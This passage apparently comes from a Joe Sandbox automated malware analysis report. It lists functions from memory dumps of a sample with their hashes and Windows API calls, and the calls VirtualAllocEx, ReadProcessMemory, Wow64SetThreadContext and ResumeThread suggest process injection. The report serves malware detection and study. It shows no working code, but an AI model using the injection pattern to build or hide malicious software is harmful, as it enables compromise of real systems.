                                                                        • Opcode Fuzzy Hash: 4f5a4711c2860a36d2f45d2ada5e2022875c269b4f9e3f0caa72e78b08922708
                                                                        • Instruction Fuzzy Hash: BD213A72D003098FDB10CFAAC4857EEBBF4EF98324F54842AD459A7240D779A945CFA5
                                                                        Function 0094D23C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0094D616,?,?,?,?,?), ref: 0094D6D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 1ad4b07d31e2fb85c1d9333019ca9ad189f6dd9c92454c9424bce47d912fb28d
                                                                        • Instruction ID: a0625de7b187a82448cd1c10c4c0221fcb7556b6445a80db69da005165a3bb7f
                                                                        • Opcode Fuzzy Hash: 1ad4b07d31e2fb85c1d9333019ca9ad189f6dd9c92454c9424bce47d912fb28d
                                                                        • Instruction Fuzzy Hash: 3221E6B5901248DFDB10CF9AD884ADEFBF8FB48320F14841AE918A7310D375A950CFA5
                                                                        Function 06CA0FD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CA1058
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: b8e773b6cb9147d580248332105c3e01706ead9a76b4d16c82f521bf3ad583cc
                                                                        • Instruction ID: 05fa387c2100d7a5757bbe80a4d4880dfad81ff85a57859947438ebc7c90bf46
                                                                        • Opcode Fuzzy Hash: b8e773b6cb9147d580248332105c3e01706ead9a76b4d16c82f521bf3ad583cc
                                                                        • Instruction Fuzzy Hash: BC2137B1D003499FDB10CFAAC880AEEFBF5FF48320F14842AE518A7240C7799910CBA1
                                                                        Function 06CA0D50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CA0DCE
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: e9bce20380d8f2d1c2a55593d04376ad0a6491db67bbe5a1e8c78c8a5b97ee33
                                                                        • Instruction ID: 70969dcd4aa6de02b10a9e58d1ca72ab1b50790e3a33b2156548930584b579ec
                                                                        • Opcode Fuzzy Hash: e9bce20380d8f2d1c2a55593d04376ad0a6491db67bbe5a1e8c78c8a5b97ee33
                                                                        • Instruction Fuzzy Hash: 1B212971D103098FDB50DFAAC485BEEBBF4EF88324F14842AD459A7240DB78A945CFA5
                                                                        Function 0094D648 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0094D616,?,?,?,?,?), ref: 0094D6D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 9d996ec14a606c8cd05bd805e6def1b306e5a04501c206c28b0d53419fcff62a
                                                                        • Instruction ID: 06a48e9ee3715bc70e03f828ffc8f56726601e2d6368acf9c87ba23f5e1a3603
                                                                        • Opcode Fuzzy Hash: 9d996ec14a606c8cd05bd805e6def1b306e5a04501c206c28b0d53419fcff62a
                                                                        • Instruction Fuzzy Hash: 5D21E2B5900258DFDB10CFAAD984ADEBBF9FB48320F14841AE958A7310C378A954CF65
                                                                        Function 06A14FDF Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 96d139767b8a6e1a73e45b3b9e25fd622dbc85d85280861d807687b9750f8d8b
                                                                        • Instruction ID: 7fcccd5bad7f6c6d6f878f85c23491554c82259d2b64a7c551d3b3f4a36e64d4
                                                                        • Opcode Fuzzy Hash: 96d139767b8a6e1a73e45b3b9e25fd622dbc85d85280861d807687b9750f8d8b
                                                                        • Instruction Fuzzy Hash: 63E17374E042188FDB50DFA9C980A9DBBF2FF89314F1491AAD918EB345D731AA85CF50
                                                                        Function 06CA0E21 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CA0E96
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 01c5d8f662b7707ff10bd55c5e5f4504041b085a58c22f5532438df382a6634f
                                                                        • Instruction ID: d65da0ec9c54592851f57184e691f335e68810831d6637538f044b231d9215b2
                                                                        • Opcode Fuzzy Hash: 01c5d8f662b7707ff10bd55c5e5f4504041b085a58c22f5532438df382a6634f
                                                                        • Instruction Fuzzy Hash: C81167729002499FDF10DFAAC845ADFBFF5EF88324F148819E559A7250C776A900CFA0
                                                                        Function 06CA0E28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CA0E96
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 72b7642a2e407547c6fcca02e572343237b23a500f8025efd7252b4eb301cdab
                                                                        • Instruction ID: e3d10d869f8cd7d150086863584d2f8f8d052eaa544a47fb19cb5d74e01d9af7
                                                                        • Opcode Fuzzy Hash: 72b7642a2e407547c6fcca02e572343237b23a500f8025efd7252b4eb301cdab
                                                                        • Instruction Fuzzy Hash: C81179729002498FCB10DFAAC844ADFFFF5EF88324F148819E559A7250C7759900CFA0
                                                                        Function 06CA0C99 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 82bd4a24bd3a7377ef4a7399a0ffdce95bf6b29ec5131ea83f7fe257400d3b7c
                                                                        • Instruction ID: 3127abd758fc67205b52cc3cf50878523d1d575674653d6389ca49598410114f
                                                                        • Opcode Fuzzy Hash: 82bd4a24bd3a7377ef4a7399a0ffdce95bf6b29ec5131ea83f7fe257400d3b7c
                                                                        • Instruction Fuzzy Hash: F11128B1D002498FDB20DFAAC845B9FFBF9EF98324F248419D459A7240DA75A940CBA5
                                                                        Function 06CA0CA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 3da903f69b0d9c5b495b0d68e4ea455cf804affb780f194ad2b34e7bc8abfc49
                                                                        • Instruction ID: 27ec8427d82bc5ee17eb59dc1a525fd2736dc445ebca338276a1fbbf442d2201
                                                                        • Opcode Fuzzy Hash: 3da903f69b0d9c5b495b0d68e4ea455cf804affb780f194ad2b34e7bc8abfc49
                                                                        • Instruction Fuzzy Hash: B8110AB1D003498FDB10DFAAC445B9EFBF9EF88324F248419D559A7240CB75A944CBA5
                                                                        Function 0094AF58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0094AFBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: c8dbd45c2382e47e2a289c16ae6b44c1458c09845725e1c5d73bcfe513cd4773
                                                                        • Instruction ID: 0c108abaf3101ee9b9884fdde2e48a08a597adef38b8adceba49d126abc40fcb
                                                                        • Opcode Fuzzy Hash: c8dbd45c2382e47e2a289c16ae6b44c1458c09845725e1c5d73bcfe513cd4773
                                                                        • Instruction Fuzzy Hash: DF11E0B6C006498FDB20CF9AD444ADEFBF8EF88324F14855AD859A7610C379A545CFA1
                                                                        Function 06CA4738 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 06CA479D
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: b8cf76277f202c925924f8ee163a031d480d7638da6bfbabf92b829e0066a2e3
                                                                        • Instruction ID: 4382340573482ce0481ff72ad5c869be79e986b44e9c4a42e92b50563951bd4a
                                                                        • Opcode Fuzzy Hash: b8cf76277f202c925924f8ee163a031d480d7638da6bfbabf92b829e0066a2e3
                                                                        • Instruction Fuzzy Hash: 1B11F2B5800349DFDB50CF9AD885BDEBBF8EB48320F10841AE958A7200C375A944CFA1
                                                                        Function 06CA4740 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 06CA479D
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: b4dda47fabdd4492366063895f49d9bf572558ced47d67e2aa0d1eabcab645ec
                                                                        • Instruction ID: 6f7deed3d8445f3a62e3fba5833f00ed1fea6b8acb2b5ad89dfde3f9977f4ef7
                                                                        • Opcode Fuzzy Hash: b4dda47fabdd4492366063895f49d9bf572558ced47d67e2aa0d1eabcab645ec
                                                                        • Instruction Fuzzy Hash: F311D0B5800349DFDB10DF9AD985BDEBBF8EB48324F24841AE958A7240C375A944CFA1
                                                                        Function 06A13D9E Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: d3a64feba279490330cdc910afd1938c0ccb72e28be3628a751659d2c2c3be8b
                                                                        • Instruction ID: 69945003cf459b8752c8afb5ee0be3676868f602ed8def35c0981c080c91a28e
                                                                        • Opcode Fuzzy Hash: d3a64feba279490330cdc910afd1938c0ccb72e28be3628a751659d2c2c3be8b
                                                                        • Instruction Fuzzy Hash: 9A91C674E042089FDF54DFA9C480AADBBF6EF89314F10856AD819EB385E7359A42CF40
                                                                        Function 06A14894 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: ea6386d32c9752498d9c21522eedade03134a9ebf3107cf5fcf0908987f07469
                                                                        • Instruction ID: 1f60f3ee9deb6f19fc6bae1b5ae1d1e917c7edd6a22c3e456437412b2883e00f
                                                                        • Opcode Fuzzy Hash: ea6386d32c9752498d9c21522eedade03134a9ebf3107cf5fcf0908987f07469
                                                                        • Instruction Fuzzy Hash: F251B2B1F002158FCB05EB7998548BEBBF6EFC8320715896AE469DB391EB309D058791
                                                                        Function 06A14428 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        • Opcode ID: 0f91ab25120eef51fd9c8c398efe100baaf25915ac9d5737335a5fb8a277e96e
                                                                        • Instruction ID: fbad346d2d8c19cd865b57299b40875ae3f0819e743a5e20551dd2a596e91a39
                                                                        • Opcode Fuzzy Hash: 0f91ab25120eef51fd9c8c398efe100baaf25915ac9d5737335a5fb8a277e96e
                                                                        • Instruction Fuzzy Hash: E741D874E011099FDB44EFA8D5909EEBBF2FB89314F108429E919AB344DB35AE42CF51
                                                                        Function 06A14417 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        • Opcode ID: 3bc7fa482c881053812dbaebaa297d88f6bf9d742a569b4476fe318ae45f7a13
                                                                        • Instruction ID: 42910fb0b3d8cbe379eb1624c7ce1990d85b3b0cce8eb7f71277e0206e361fc9
                                                                        • Opcode Fuzzy Hash: 3bc7fa482c881053812dbaebaa297d88f6bf9d742a569b4476fe318ae45f7a13
                                                                        • Instruction Fuzzy Hash: 1D411B74E001099FDB45EFA8D8905EEBBF2FB89314F10846AE819EB340DB359E02CB51
                                                                        Function 06A15608 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 9e42e4e2a31d3885d1a5447f5b6dcacee9cb03e4879199eacb943cbf30deb3d6
                                                                        • Instruction ID: 4d8df20b568832f34788498e29d4bd493a63c95189958506b9eb19c7c10d1b99
                                                                        • Opcode Fuzzy Hash: 9e42e4e2a31d3885d1a5447f5b6dcacee9cb03e4879199eacb943cbf30deb3d6
                                                                        • Instruction Fuzzy Hash: D4110DB5F0021A8BDB54FBA9D9106EEBAB6ABC8310B144079C515AB344EB319E01CBE5
                                                                        Function 06A1ACB0 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 56a71df6e0c00718d382f6b223ecd7a80b25d41caa0fffe705177669c9403492
                                                                        • Instruction ID: 4e59a446be9494746f84ab3f5762b0d31a473056e4464fa247f5b007cc411366
                                                                        • Opcode Fuzzy Hash: 56a71df6e0c00718d382f6b223ecd7a80b25d41caa0fffe705177669c9403492
                                                                        • Instruction Fuzzy Hash: 37110AB0D006088BDB18DFEAC4546EEFBF6EF89300F14C02AD415AB358DB7419468B90
                                                                        Function 06A1ACA1 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: f40c64c704f93b8f6551fa83bc351aec978b26a7a9a1c3b30b867af313d57015
                                                                        • Instruction ID: 73c042188dddc7aae171ecaeab553cdff35d9fe9427bf894986a4f22c37af1d0
                                                                        • Opcode Fuzzy Hash: f40c64c704f93b8f6551fa83bc351aec978b26a7a9a1c3b30b867af313d57015
                                                                        • Instruction Fuzzy Hash: 9D11ECB5D056088FEB48DFDAD5452EDFBF2AF89300F14C02AD419AB359EB3419468F90
                                                                        Function 06A1AD80 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: f18ad5bb9288696e3f4e2a1a2f1355fda9dc08ebf37721f31bc833657157a6e8
                                                                        • Instruction ID: fcfa9dce68765a3b24bd591e975b6e5c51428d6dfb03c15487995622cbc9ac8a
                                                                        • Opcode Fuzzy Hash: f18ad5bb9288696e3f4e2a1a2f1355fda9dc08ebf37721f31bc833657157a6e8
                                                                        • Instruction Fuzzy Hash: 19119D75E002198FCF09CFE8D8809ADFBB2FF88300F10816AE919AB365C7356906CB40
                                                                        Function 06A1AE78 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 4273befbad90ace9073bf25502a05cd0f1dd946ac2078315d4aa135c720ac1b4
                                                                        • Instruction ID: d159e9c70552e8c424142f0e5eb2b0daf4dfa10939a590b63d26863f8a64ee29
                                                                        • Opcode Fuzzy Hash: 4273befbad90ace9073bf25502a05cd0f1dd946ac2078315d4aa135c720ac1b4
                                                                        • Instruction Fuzzy Hash: 86116D75E002199FCF08DFE9D8809ADFBB2FB88310F20812AE919AB355C7356905CF50
                                                                        Function 06A17450 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: m
                                                                        • API String ID: 0-3775001192
                                                                        • Opcode ID: cce0a24ba7575c4a976d7cc17968748e7669ea3b55fd266a4cad3870091ca7fd
                                                                        • Instruction ID: 2e3aca3e42169fe2b32ec3ac8363b7c3bf605e83c0cd942cb8f551e7ebdad089
                                                                        • Opcode Fuzzy Hash: cce0a24ba7575c4a976d7cc17968748e7669ea3b55fd266a4cad3870091ca7fd
                                                                        • Instruction Fuzzy Hash: 62E0C730D46208AFDB84FFB8D9046ADBFF8AB00301F0015A8C8869B340E7319E84CAA1
                                                                        Function 06A13348 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: 423b11d22c43e865c4ee294d1da25bf4fd9008caba1b99b155a4a9702fbfcb55
                                                                        • Instruction ID: f7aa123fdb261986bd54aa9885f63b857c8223a07220e05a6b6daaaf902daefd
                                                                        • Opcode Fuzzy Hash: 423b11d22c43e865c4ee294d1da25bf4fd9008caba1b99b155a4a9702fbfcb55
                                                                        • Instruction Fuzzy Hash: CEE0C230C06208EBDF10EFB4D4082BDFBF8E705301F104599C80A9B240EB355E42D785
                                                                        Function 06A14038 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7
                                                                        • API String ID: 0-1790921346
                                                                        • Opcode ID: 39068bd64d94483ef00cad36765d8c2230625ee7e91c478eefd00084958121c8
                                                                        • Instruction ID: 2115e033ec27eaa39e901e46dada11f9d80fe3f3f2841697eee420d3cdb01ad7
                                                                        • Opcode Fuzzy Hash: 39068bd64d94483ef00cad36765d8c2230625ee7e91c478eefd00084958121c8
                                                                        • Instruction Fuzzy Hash: CCE0C270C4610CEBDB50FFB9E5046AD7BF8E748300F4005A8C4065B240D7391E45C681
                                                                        Function 06A1AEF0 Relevance: .3, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9b7a79596b1accac91f99a5804a9c4e910f987230f710adbeb972f90f85e04f8
                                                                        • Instruction ID: 20d4dc6423172749a0fdf1bc6b890f869f9706ec313999fd158af3b7a14781e4
                                                                        • Opcode Fuzzy Hash: 9b7a79596b1accac91f99a5804a9c4e910f987230f710adbeb972f90f85e04f8
                                                                        • Instruction Fuzzy Hash: D2A12C70E15219CFEB44EFA9D440AEDBBB6FF88300F109615E419AB355DB30A946CF91
                                                                        Function 06A1AEEF Relevance: .2, Instructions: 234COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d5a8f363cacbbe05dcfab9aff60f756366686e63544189ba7fa3df94f7e926aa
                                                                        • Instruction ID: 94afff4154900eccc792ec4bf31acbb44b838077893eb862fe1ce3996cf45e20
                                                                        • Opcode Fuzzy Hash: d5a8f363cacbbe05dcfab9aff60f756366686e63544189ba7fa3df94f7e926aa
                                                                        • Instruction Fuzzy Hash: 7E913B70E15219CFEB44EFA9D540AEDBBB6FF88300F108619E419AB355DB30AD46CB91
                                                                        Function 06A16D37 Relevance: .2, Instructions: 193COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c1ba07fb513db894533af54fb4699f1d4dab08d6364b4d092d62c7232c5a063
                                                                        • Instruction ID: 98ec35913f01ff1ee535c52a214d04731d2123b07eacd3d08aff81462c57370c
                                                                        • Opcode Fuzzy Hash: 7c1ba07fb513db894533af54fb4699f1d4dab08d6364b4d092d62c7232c5a063
                                                                        • Instruction Fuzzy Hash: 5D819275E142198FDF51DFA8C880AAEBBF6EF49304F1094A9E819EB311D7319A46CF40
                                                                        Function 06A16FA0 Relevance: .2, Instructions: 175COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b167be04f519acabff32cad762a1c3c7076e560baf9ca0727144320118f11bad
                                                                        • Instruction ID: 2ceea2c202a1efb115bfcbbff9c4a8657e96ee1a631e73f7bd528d0f7d6c50b7
                                                                        • Opcode Fuzzy Hash: b167be04f519acabff32cad762a1c3c7076e560baf9ca0727144320118f11bad
                                                                        • Instruction Fuzzy Hash: F651E2B1E043889FCB41DFA8D8505DEBFF5EF4A220F15849AD804DB212D7399906CB61
                                                                        Function 06A18560 Relevance: .1, Instructions: 114COMMON
                                                                        Download Yara Rule
